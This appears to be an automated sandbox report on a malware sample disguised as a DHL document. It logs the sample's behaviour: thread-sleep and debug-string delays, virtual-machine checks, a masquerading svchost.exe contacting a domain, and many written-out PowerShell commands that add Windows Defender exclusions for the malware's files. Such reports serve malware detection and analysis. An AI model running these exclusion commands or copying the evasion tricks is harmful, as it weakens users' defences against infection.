Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Section loaded: OutputDebugStringW count: 106
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Section loaded: OutputDebugStringW count: 112

Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4249
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2926
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4843
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1992
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2690
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Window / User API: threadDelayed 5533
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Window / User API: threadDelayed 2168

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe TID: 5884	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe TID: 6052	Thread sleep count: 99 > 30
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe TID: 4904	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe TID: 2848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1520	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1520	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6488	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680	Thread sleep count: 4843 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6824	Thread sleep count: 47 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664	Thread sleep count: 1992 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6396	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6396	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5248	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5248	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe TID: 6512	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe TID: 1596	Thread sleep time: -820000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe TID: 5680	Thread sleep count: 100 > 30
Source: C:\Windows\System32\svchost.exe TID: 1220	Thread sleep time: -210000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 00000001.00000002.253935389.000001B410B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.339964964.000001C6EEC60000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.402859163.0000018ABE540000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: DHL_document11022020680908911.exe, 00000000.00000003.231282357.00000000058C1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW(A
Source: svchost.exe, 00000014.00000003.448192999.0000000005143000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: DHL_document11022020680908911.exe, 00000000.00000003.231282357.00000000058C1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000001.00000002.253935389.000001B410B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.339964964.000001C6EEC60000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.402859163.0000018ABE540000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000001.00000002.253935389.000001B410B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.339964964.000001C6EEC60000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.402859163.0000018ABE540000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000001.00000002.253935389.000001B410B40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.339964964.000001C6EEC60000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.402859163.0000018ABE540000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Network Connect: 172.67.150.212 443
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Domain query: myliverpoolnews.cf

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document11022020680908911.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document11022020680908911.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document11022020680908911.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Users\user\Desktop\DHL_document11022020680908911.exe C:\Users\user\Desktop\DHL_document11022020680908911.exe
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Process created: C:\Users\user\Desktop\DHL_document11022020680908911.exe C:\Users\user\Desktop\DHL_document11022020680908911.exe
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Users\user\Desktop\DHL_document11022020680908911.exe VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
